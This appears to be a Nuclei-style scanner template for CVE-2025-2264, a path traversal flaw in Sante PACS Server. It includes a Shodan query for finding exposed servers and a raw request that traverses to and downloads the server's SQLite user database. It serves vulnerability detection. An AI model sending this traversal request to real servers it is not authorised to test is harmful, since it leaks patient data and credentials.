id: CVE-2025-2264

info:
  name: Sante PACS Server.exe - Path Traversal Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
  impact: |
    Unauthenticated attackers can exploit path traversal to download arbitrary files from the server, potentially exposing sensitive patient data, credentials, and configuration files.
  remediation: |
    Upgrade to Sante PACS Server version 4.1.1 or later that properly validates file paths.
  reference:
    - https://www.tenable.com/security/research/tra-2025-08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2264
    cwe-id: CWE-22
    epss-score: 0.64369
    epss-percentile: 0.98465
    cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: santesoft
    product: sante_pacs_server
    shodan-query: http.favicon.hash:1185161484
  tags: cve,cve2025,sante,pacs,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /assets/../../.HTTP/HTTP.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'SQLite','TABLE USER','format')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022047f6a212ba7c5ca3872578f12eb9b3455c1a70c53e2a46641dc45ec20a3af3dc022100c387b0580a94e4ee18288da78f0ef72a1ebb9ba20aa787b9630b16a0689ff379:922c64590222798bb761d5b6d8e72950